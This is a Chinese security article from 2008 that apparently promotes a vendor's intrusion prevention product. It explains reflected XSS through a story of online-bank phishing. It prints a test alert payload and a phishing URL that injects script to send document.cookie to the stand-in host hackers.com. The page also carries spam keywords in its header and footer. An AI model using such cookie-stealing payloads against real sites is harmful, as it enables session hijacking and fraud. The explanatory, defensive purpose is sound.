国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

長(zhǎng)URL背后的殺機(jī) 網(wǎng)站防范XSS攻擊實(shí)錄
2008-12-03   

XSS(Cross-site scripting)攻擊是最常見(jiàn)的Web攻擊之一,和其它Web攻擊類(lèi)似的是,XSS也是利用Web頁(yè)面編碼的不嚴(yán)謹(jǐn),和SQL注入漏洞所不同的是,XSS漏洞更加難以發(fā)現(xiàn)避免。就連McAfee、Symantec、VeriSign這種專(zhuān)業(yè)安全公司,也在2008年1月的XEED.com報(bào)告中被爆出官網(wǎng)存在XSS漏洞。

此外,XSS攻擊還有另外一個(gè)與眾不同的特性:雖然駭客利用的是Web業(yè)務(wù)系統(tǒng)存在的漏洞,但真正的受害者卻是隨后訪問(wèn)這些Web系統(tǒng)的用戶(hù)。

正是由于以上兩個(gè)特性——難以避免、難以察覺(jué),所以想要防御XSS攻擊非常困難。啟明星辰推出的天清入侵防御產(chǎn)品,采用基于攻擊手法分析的檢測(cè)方法,對(duì)Web威脅如SQL注入、XSS攻擊等進(jìn)行全面檢測(cè)和防御。與傳統(tǒng)的基于數(shù)據(jù)特征匹配和基于異常模型構(gòu)建的Web安全相比,有著更低的漏報(bào)率和誤報(bào)率。

1.網(wǎng)上銀行謹(jǐn)防XSS攻擊

大家都用過(guò)網(wǎng)站的搜索功能,提供一個(gè)搜索輸入框,用戶(hù)在框中輸入想要查找的內(nèi)容,提交后臺(tái)數(shù)據(jù)庫(kù)檢索。但如果提交的輸入信息不是字符串,而是一段可執(zhí)行指令呢?一個(gè)很常見(jiàn)的XSS例子,在輸入框中填入“"><SCRIPT>alert('XSS%20Testing')</SCRIPT>”(不包括最外側(cè)的雙引號(hào)),一些沒(méi)有做嚴(yán)格過(guò)濾的站點(diǎn)將會(huì)彈出一個(gè)alert框,顯示“XSS Testing”,這意味著這段腳本已經(jīng)被執(zhí)行了。Reflect-based XSS(反射式XSS)利用的就是這樣一個(gè)原理。

下就是一則利用XSS漏洞進(jìn)行網(wǎng)銀詐騙的真實(shí)案例。

小陳是ebank  網(wǎng)上銀行的安全維護(hù)人員,有一天忽然接到客服部門(mén)轉(zhuǎn)來(lái)的客戶(hù)投訴,稱(chēng)收到一條交易提醒,但該客戶(hù)僅做過(guò)網(wǎng)上銀行的登錄,并沒(méi)有做過(guò)付款動(dòng)作。

“你們給我發(fā)了一封郵件,說(shuō)是有分期付款買(mǎi)筆記本電腦的優(yōu)惠活動(dòng),我就點(diǎn)鏈接進(jìn)來(lái)看,可沒(méi)幾分鐘,我就收到交易提醒,說(shuō)網(wǎng)上付款4784元,請(qǐng)我確認(rèn),但我還沒(méi)下單呢,你們這是怎么回事?”電話里客戶(hù)的聲音明顯帶著壓抑不住的憤怒。
經(jīng)過(guò)確認(rèn),該客戶(hù)使用的PC并不存在病毒,而且也的確是僅點(diǎn)擊了廣告郵件的鏈接而已。“那你把這封郵件發(fā)給我看看吧”,小陳在排除了其它可能性后,這么告訴客戶(hù),“分析出結(jié)果我們的客服人員將第一時(shí)間通知您,您現(xiàn)在的這筆費(fèi)用我們先凍結(jié),待解決后給您恢復(fù)”。

在收到客戶(hù)轉(zhuǎn)發(fā)來(lái)的郵件后,小陳第一眼就看出了問(wèn)題,這不是ebank的系統(tǒng)郵件,而是一封釣魚(yú)郵件,偽造了發(fā)件人名稱(chēng)的釣魚(yú)郵件。其中關(guān)于促銷(xiāo)優(yōu)惠活動(dòng)的頁(yè)面都是截取了真實(shí)活動(dòng)頁(yè)面,但在“點(diǎn)擊參加活動(dòng)”的按鈕后面,卻隱藏著重重的殺機(jī)。
這個(gè)鏈接并非是正常促銷(xiāo)活動(dòng)所在的頁(yè)面,而是如下所示的一個(gè)長(zhǎng)URL

<ahref="http://www.ebank.com/query.asp?word=%3Cscript%3Evar+img+%3D+new+Image%28%29%

3Bimg.src%3D%22http%3A%2F%2Fwww.hackers.com%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E+">點(diǎn)擊參加活動(dòng)</a>

一般的用戶(hù)在看到URL開(kāi)頭是正確的網(wǎng)站域名ebank,都不會(huì)懷疑郵件的真實(shí)性,而駭客正是利用這一心理,精心設(shè)置了圈套,利用了Ebank的某個(gè)輸入域中存在反射式XSS攻擊漏洞,通過(guò)<script>標(biāo)簽注入

"var img = new Image();img.src="

小陳拿著分析結(jié)果去找信息中心沈主任匯報(bào),而沈主任果然經(jīng)驗(yàn)豐富:“先發(fā)布網(wǎng)站緊急通知,告知用戶(hù)注意不要隨意點(diǎn)擊鏈接,然后迅速找專(zhuān)業(yè)安全公司做安全服務(wù),查清問(wèn)題的根源再說(shuō)。”并立刻聯(lián)系了專(zhuān)業(yè)安全廠商啟明星辰的當(dāng)?shù)劁N(xiāo)售人員。

經(jīng)過(guò)安星遠(yuǎn)程網(wǎng)站安全檢查服務(wù)的檢測(cè),發(fā)現(xiàn)ebank的網(wǎng)站存在數(shù)個(gè)XSS和SQL注入的漏洞,考慮到代碼級(jí)修改費(fèi)時(shí)太長(zhǎng),沈主任決定雙管齊下,一方面找開(kāi)發(fā)人員修補(bǔ)現(xiàn)有漏洞,一方面咨詢(xún)是否有現(xiàn)成的專(zhuān)業(yè)安全產(chǎn)品可以防范XSS攻擊。在對(duì)比了數(shù)家國(guó)內(nèi)外的安全產(chǎn)品后,啟明星辰天清入侵防御產(chǎn)品的專(zhuān)業(yè)的Web安全防御能力給沈主任留下了深刻的印象,特別是其采用了攻擊機(jī)理分析方式,在防范XSS攻擊和SQL注入方面都有很好的效果。對(duì)網(wǎng)銀來(lái)說(shuō),時(shí)間可就是真金白銀,所以沈主任當(dāng)機(jī)立斷先購(gòu)買(mǎi)一臺(tái)天清入侵防御系統(tǒng),并迅速上線。當(dāng)小陳嘗試用原來(lái)的長(zhǎng)URL進(jìn)行XSS攻擊時(shí),發(fā)現(xiàn)天清入侵防御產(chǎn)品信息報(bào)警監(jiān)視臺(tái)上已經(jīng)出現(xiàn)了報(bào)警信息并進(jìn)行了及時(shí)的阻斷。

2.相關(guān)提示

反射式XSS攻擊的對(duì)象如果是網(wǎng)站管理員,那么整個(gè)網(wǎng)站的權(quán)限都有可能因此而泄露給駭客。作為網(wǎng)站的所有者,不能因?yàn)槭芄粽咧皇瞧胀ㄓ脩?hù)而對(duì)反射式XSS攻擊掉以輕心,采用專(zhuān)業(yè)的安全產(chǎn)品或仔細(xì)檢查你的所有頁(yè)面,既是對(duì)用戶(hù)負(fù)責(zé)也保障了自己的安全。而普通用戶(hù)也需要加強(qiáng)自身的安全意識(shí):采用擁有反向地址檢查技術(shù)的郵件系統(tǒng),盡量不要點(diǎn)擊過(guò)長(zhǎng)且包含未知域名的URL,當(dāng)然,采用一款防反射式XSS攻擊的瀏覽器,比如IE8,也是很有必要的。


熱詞搜索:

上一篇:對(duì)江西某電信服務(wù)器的一次安全檢查(1)
下一篇:利用跨站請(qǐng)求偽造攻擊本地網(wǎng)絡(luò)設(shè)備

分享到: 收藏
主站蜘蛛池模板: 铅山县| 龙川县| 皋兰县| 伊金霍洛旗| 高州市| 镇沅| 库伦旗| 德化县| 商丘市| 大英县| 孝义市| 赤水市| 平南县| 绥江县| 博罗县| 舞阳县| 盖州市| 天祝| 周口市| 安平县| 惠水县| 揭阳市| 咸阳市| 铜川市| 富裕县| 阜南县| 长沙市| 灵山县| 泸水县| 永善县| 新昌县| 长宁区| 吐鲁番市| 馆陶县| 岳普湖县| 察哈| 贡山| 泰安市| 武功县| 丁青县| 济南市|